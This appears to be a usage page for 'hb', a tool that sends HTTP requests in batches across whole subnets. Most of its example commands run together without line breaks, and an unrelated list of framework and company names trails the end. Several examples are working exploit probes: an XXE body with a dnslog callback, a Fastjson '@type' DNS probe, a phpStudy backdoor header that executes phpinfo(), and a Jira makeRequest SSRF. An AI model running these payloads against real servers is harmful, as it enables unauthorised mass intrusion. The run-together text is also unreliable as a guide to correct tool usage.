Fast http batch request tool
./hb -f ips.txt -p 80
./hb -host 192.168.1.1/24 -H "Host: bypasscdn"./hb -host 192.168.1.1/24 -pg./hb -host 192.168.1.1/24 -redirect./hb -host 192.168.1.1/24 -grep "admin"./hb -host 192.168.1.1/24 -filter "nginx"./hb -host 192.168.1.1/24 -code 2 # 2xx./hb -host 192.168.1.1/24 -p 80,443,8080 -response./hb -host 192.168.1.1/24 -p 80,443,8080 -random./hb -host 192.168.1.1/24 -p 80,443,8080 -body "a=1&b=2&c=2"
# post body from file
./hb -host 192.168.1.1/24 -p 80,443,8080 -bodyfile ./exploit./hb -host 192.168.1.1/24 -p 80,443,8080 -method PUT./hb -host 192.168.1.1/24 -p 80,443,8080 -debug
./hb -host 192.168.1.1/24 -p 9200 -path "/_cat" -grep "/_cat/allocation"./hb -host 192.168.1.1/24 -p 80,443,8080 -path /phpinfo.php -code 2 -grep 'PHP Version' -regexp 'PHP Version(.*?)<'./hb -host 192.168.1.1/24 -p 80 -path /xxe.php -body '<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY remote SYSTEM "http://{{hostname}}.dnslog/">]><x>&remote;</x>' -replace./hb -host 192.168.1.1/24 -p 80,443,8080 -H "Content-Type: application/json" -body '{"@type": "java.net.InetAddress", "val":"{{hostname}}.dnslog"}' -replace -redirect./hb -host 192.168.1.1/24 -host 192.168.1.1/24 -p 80,443,7001 -H "Authorization: Basic" -code 401./hb -host 192.168.1.1/24 -p 80,443,8080 -H "Accept-Charset: cGhwaW5mbygpOwo=" -H "Accept-Encoding: gzip,deflate" -regexp '<tr><td class="e">disable_functions</td><td class="v">(.*?)</td>' -redirect./hb -host 192.168.1.1/24 -p 80,443,8080 -path "/plugins/servlet/gadgets/makeRequest?url={{scheme}}://{{host}}@baidu.com/" -H "X-Atlassian-Token: no-check" -replace -grep "www.baidu.com" -regexp '<meta name="ajs-version-number" content="(.*?)">' -redirect
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent